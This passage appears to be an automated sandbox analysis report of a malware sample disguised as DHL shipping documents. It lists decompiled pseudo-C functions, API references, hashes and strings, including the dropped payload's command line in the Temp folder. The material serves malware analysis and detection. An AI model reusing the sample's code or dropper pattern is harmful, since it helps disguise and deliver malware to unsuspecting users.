                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                        • GlobalFree.KERNEL32 ref: 00402A06
                        • GlobalFree.KERNEL32 ref: 00402A19
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                        • String ID:
                        • API String ID: 2667972263-0
                        • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                        • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                        • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                        • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                        				char _v68;
                        				char _v132;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t23;
                        				signed int _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t44;
                        				signed int _t46;
                        				signed int _t50;
                        				signed int _t52;
                        				signed int _t53;
                        				signed int _t55;
                        
                        				_t23 = _a16;
                        				_t53 = _a12;
                        				_t44 = 0xffffffdc;
                        				if(_t23 == 0) {
                        					_push(0x14);
                        					_pop(0);
                        					_t24 = _t53;
                        					if(_t53 < 0x100000) {
                        						_push(0xa);
                        						_pop(0);
                        						_t44 = 0xffffffdd;
                        					}
                        					if(_t53 < 0x400) {
                        						_t44 = 0xffffffde;
                        					}
                        					if(_t53 < 0xffff3333) {
                        						_t52 = 0x14;
                        						asm("cdq");
                        						_t24 = 1 / _t52 + _t53;
                        					}
                        					_t25 = _t24 & 0x00ffffff;
                        					_t55 = _t24 >> 0;
                        					_t46 = 0xa;
                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                        				} else {
                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                        					_t50 = 0;
                        				}
                        				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                        				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                        				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                        				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                        				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                        			}




















                        APIs
                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                        • wsprintfW.USER32 ref: 00404F1B
                        • SetDlgItemTextW.USER32 ref: 00404F2E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s$H7B
                        • API String ID: 3540041739-107966168
                        • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                        • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                        • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                        • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                        				void* _v8;
                        				int _v12;
                        				short _v536;
                        				void* _t27;
                        				signed int _t33;
                        				intOrPtr* _t35;
                        				signed int _t45;
                        				signed int _t46;
                        				signed int _t47;
                        
                        				_t46 = _a12;
                        				_t47 = _t46 & 0x00000300;
                        				_t45 = _t46 & 0x00000001;
                        				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                        				if(_t27 == 0) {
                        					if((_a12 & 0x00000002) == 0) {
                        						L3:
                        						_push(0x105);
                        						_push( &_v536);
                        						_push(0);
                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                        							__eflags = _t45;
                        							if(__eflags != 0) {
                        								L10:
                        								RegCloseKey(_v8);
                        								return 0x3eb;
                        							}
                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                        							__eflags = _t33;
                        							if(_t33 != 0) {
                        								break;
                        							}
                        							_push(0x105);
                        							_push( &_v536);
                        							_push(_t45);
                        						}
                        						RegCloseKey(_v8);
                        						_t35 = E00406A35(3);
                        						if(_t35 != 0) {
                        							return  *_t35(_a4, _a8, _t47, 0);
                        						}
                        						return RegDeleteKeyW(_a4, _a8);
                        					}
                        					_v12 = 0;
                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                        						goto L10;
                        					}
                        					goto L3;
                        				}
                        				return _t27;
                        			}













                        APIs
                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Similarity
                        • API ID: CloseEnum$DeleteValue
                        • String ID:
                        • API String ID: 1354259210-0
                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00401D81(void* __ebx, void* __edx) {
                        				struct HWND__* _t30;
                        				WCHAR* _t38;
                        				void* _t48;
                        				void* _t53;
                        				signed int _t55;
                        				signed int _t60;
                        				long _t63;
                        				void* _t65;
                        
                        				_t53 = __ebx;
                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                        				} else {
                        					E00402D84(2);
                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                        				}
                        				_t55 =  *(_t65 - 0x24);
                        				 *(_t65 + 8) = _t30;
                        				_t60 = _t55 & 0x00000004;
                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                        				if((_t55 & 0x00010000) == 0) {
                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                        				} else {
                        					_t38 = E00402DA6(0x11);
                        				}
                        				 *(_t65 - 0x44) = _t38;
                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                        				asm("sbb esi, esi");
                        				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                        					DeleteObject(_t48);
                        				}
                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                        					_push(_t63);
                        					E004065AF();
                        				}
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                        				return 0;
                        			}












                        APIs
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                        • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                        • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                        • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E00401E4E(intOrPtr __edx) {
                        				void* __edi;
                        				int _t9;
                        				signed char _t15;
                        				struct HFONT__* _t18;
                        				intOrPtr _t30;
                        				void* _t31;
                        				struct HDC__* _t33;
                        				void* _t35;
                        
                        				_t30 = __edx;
                        				_t33 = GetDC( *(_t35 - 8));
                        				_t9 = E00402D84(2);
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                        				ReleaseDC( *(_t35 - 8), _t33);
                        				 *0x40ce08 = E00402D84(3);
                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				 *0x40ce0f = 1;
                        				 *0x40ce0c = _t15 & 0x00000001;
                        				 *0x40ce0d = _t15 & 0x00000002;
                        				 *0x40ce0e = _t15 & 0x00000004;
                        				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                        				_t18 = CreateFontIndirectW(0x40cdf8);
                        				_push(_t18);
                        				_push(_t31);
                        				E004065AF();
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                        				return 0;
                        			}












                        APIs
                        • GetDC.USER32(?), ref: 00401E51
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                        • ReleaseDC.USER32 ref: 00401E84
                          • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                          • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                        • String ID:
                        • API String ID: 2584051700-0
                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E00401C43(intOrPtr __edx) {
                        				int _t29;
                        				long _t30;
                        				signed int _t32;
                        				WCHAR* _t35;
                        				long _t36;
                        				int _t41;
                        				signed int _t42;
                        				int _t46;
                        				int _t56;
                        				intOrPtr _t57;
                        				struct HWND__* _t63;
                        				void* _t64;
                        
                        				_t57 = __edx;
                        				_t29 = E00402D84(3);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 - 0x18) = _t29;
                        				_t30 = E00402D84(4);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 + 8) = _t30;
                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                        				}
                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                        					 *(_t64 + 8) = E00402DA6(0x44);
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                        				_push(1);
                        				if(__eflags != 0) {
                        					_t61 = E00402DA6();
                        					_t32 = E00402DA6();
                        					asm("sbb ecx, ecx");
                        					asm("sbb eax, eax");
                        					_t35 =  ~( *_t31) & _t61;
                        					__eflags = _t35;
                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                        					goto L10;
                        				} else {
                        					_t63 = E00402D84();
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t41 = E00402D84(2);
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t56 =  *(_t64 - 0x1c) >> 2;
                        					if(__eflags == 0) {
                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                        						L10:
                        						 *(_t64 - 0x38) = _t36;
                        					} else {
                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                        						asm("sbb eax, eax");
                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                        					}
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                        					_push( *(_t64 - 0x38));
                        					E004065AF();
                        				}
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                        				return 0;
                        			}
















                        APIs
                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                        Strings
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                        • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                        • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                        • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                        				int _v8;
                        				long _t21;
                        				long _t24;
                        				char* _t30;
                        
                        				asm("sbb eax, eax");
                        				_v8 = 0x800;
                        				_t5 =  &_a4; // 0x422728
                        				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                        				_t30 = _a16;
                        				if(_t21 != 0) {
                        					L4:
                        					 *_t30 =  *_t30 & 0x00000000;
                        				} else {
                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                        					_t21 = RegCloseKey(_a20);
                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                        						goto L4;
                        					}
                        				}
                        				return _t21;
                        			}








                        APIs
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,?,0040679D,80000002), ref: 0040657C
                        • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728), ref: 00406587
                        Strings
                        • "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m, xrefs: 0040653D
                        • ('B, xrefs: 0040655B
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$('B
                        • API String ID: 3356406503-4105024501
                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00405F37(WCHAR* _a4) {
                        				WCHAR* _t9;
                        
                        				_t9 = _a4;
                        				_push( &(_t9[lstrlenW(_t9)]));
                        				_push(_t9);
                        				if( *(CharPrevW()) != 0x5c) {
                        					lstrcatW(_t9, 0x40a014);
                        				}
                        				return _t9;
                        			}





                        APIs
                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3916508600
                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                        				int _t15;
                        				long _t16;
                        
                        				_t15 = _a8;
                        				if(_t15 != 0x102) {
                        					if(_t15 != 0x200) {
                        						_t16 = _a16;
                        						L7:
                        						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                        							_push(_t16);
                        							_push(6);
                        							 *0x423734 = _t16;
                        							E00404FFF();
                        						}
                        						L11:
                        						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                        					}
                        					if(IsWindowVisible(_a4) == 0) {
                        						L10:
                        						_t16 = _a16;
                        						goto L11;
                        					}
                        					_t16 = E00404F7F(_a4, 1);
                        					_t15 = 0x419;
                        					goto L7;
                        				}
                        				if(_a12 != 0x20) {
                        					goto L10;
                        				}
                        				E00404610(0x413);
                        				return 0;
                        			}






                        APIs
                        • IsWindowVisible.USER32(?), ref: 0040566D
                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                          • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                        • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                        • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                        • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00405F83(WCHAR* _a4) {
                        				WCHAR* _t5;
                        				WCHAR* _t7;
                        
                        				_t7 = _a4;
                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                        				while( *_t5 != 0x5c) {
                        					_push(_t5);
                        					_push(_t7);
                        					_t5 = CharPrevW();
                        					if(_t5 > _t7) {
                        						continue;
                        					}
                        					break;
                        				}
                        				 *_t5 =  *_t5 & 0x00000000;
                        				return  &(_t5[1]);
                        			}






                        APIs
                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 00405F89
                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 00405F99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-1669384263
                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                        				int _v8;
                        				int _t12;
                        				int _t14;
                        				int _t15;
                        				CHAR* _t17;
                        				CHAR* _t27;
                        
                        				_t12 = lstrlenA(_a8);
                        				_t27 = _a4;
                        				_v8 = _t12;
                        				while(lstrlenA(_t27) >= _v8) {
                        					_t14 = _v8;
                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                        					_t15 = lstrcmpiA(_t27, _a8);
                        					_t27[_v8] =  *(_t14 + _t27);
                        					if(_t15 == 0) {
                        						_t17 = _t27;
                        					} else {
                        						_t27 = CharNextA(_t27);
                        						continue;
                        					}
                        					L5:
                        					return _t17;
                        				}
                        				_t17 = 0;
                        				goto L5;
                        			}










                        APIs
                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                        • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
